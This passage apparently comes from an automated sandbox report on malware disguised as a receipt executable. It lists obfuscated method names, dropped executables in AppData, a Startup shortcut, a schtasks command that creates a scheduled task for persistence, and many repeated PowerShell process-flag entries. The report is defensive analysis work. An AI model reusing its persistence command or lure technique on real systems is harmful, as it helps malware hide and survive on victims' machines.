            Source: 0.2.Receipt-#202431029B.exe.3718dd8.4.raw.unpack, JC2QDIRFrOWcdCwqFkG.cs High entropy of concatenated method names: 'ToString', 'JTLkPSxkEm', 'pBlkJ3IsrF', 'KIjk9Ox4T4', 'gVHkNF130W', 'GwZkAetKjy', 'WGfk4AKv6J', 'Xf5k78VusY', 'iTmmZ5Tzd7PmFFLqBbN', 'EmKa7sH57XJBJJ0fZhd'
            Source: 0.2.Receipt-#202431029B.exe.3718dd8.4.raw.unpack, Oggr1D9mrEqm09cS03.cs High entropy of concatenated method names: 'hSPgTtCpfU', 'UTEgCxLgpY', 'zPB348QiBA', 'AQ137sVCqF', 'xmD3W60qkS', 'hHf3fkRmRt', 'qZd3y6hZ1x', 'oKZ3SCDokm', 'zia3snO3PS', 'HKU3LMAVmh'
            Source: 0.2.Receipt-#202431029B.exe.3718dd8.4.raw.unpack, MiqhSGVvq03kxUsc87.cs High entropy of concatenated method names: 'Dispose', 'Hp7RjuCKfl', 'ySxFAkgY23', 'lFX3jABUuf', 'U9YR0my4s5', 'lONRzS2em2', 'ProcessDialogKey', 'aVEFU9bLHS', 'qvvFRiXKdE', 'loQFF3RfP2'
            Source: 0.2.Receipt-#202431029B.exe.3718dd8.4.raw.unpack, BK6KfXxNl4cYo1AxVW.cs High entropy of concatenated method names: 'QN0eLpDIJv', 'YEGe80E26n', 'yPJexg4gJp', 'qLqel9xOWx', 'hv3eAM37ZP', 'YUoe4cHJiW', 'cKie7hj5Fh', 'oeWeWuserN', 'Ixbef0D2Jk', 'UiNeyfkGVV'
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe File created: C:\Users\user\AppData\Roaming\XetHVID.exe
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe File created: C:\Users\user\AppData\Roaming\Notepab.exe

            Boot Survival

            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\XetHVID" /XML "C:\Users\user\AppData\Local\Temp\tmp2668.tmp"
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Notepab.lnk

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Receipt-#202431029B.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
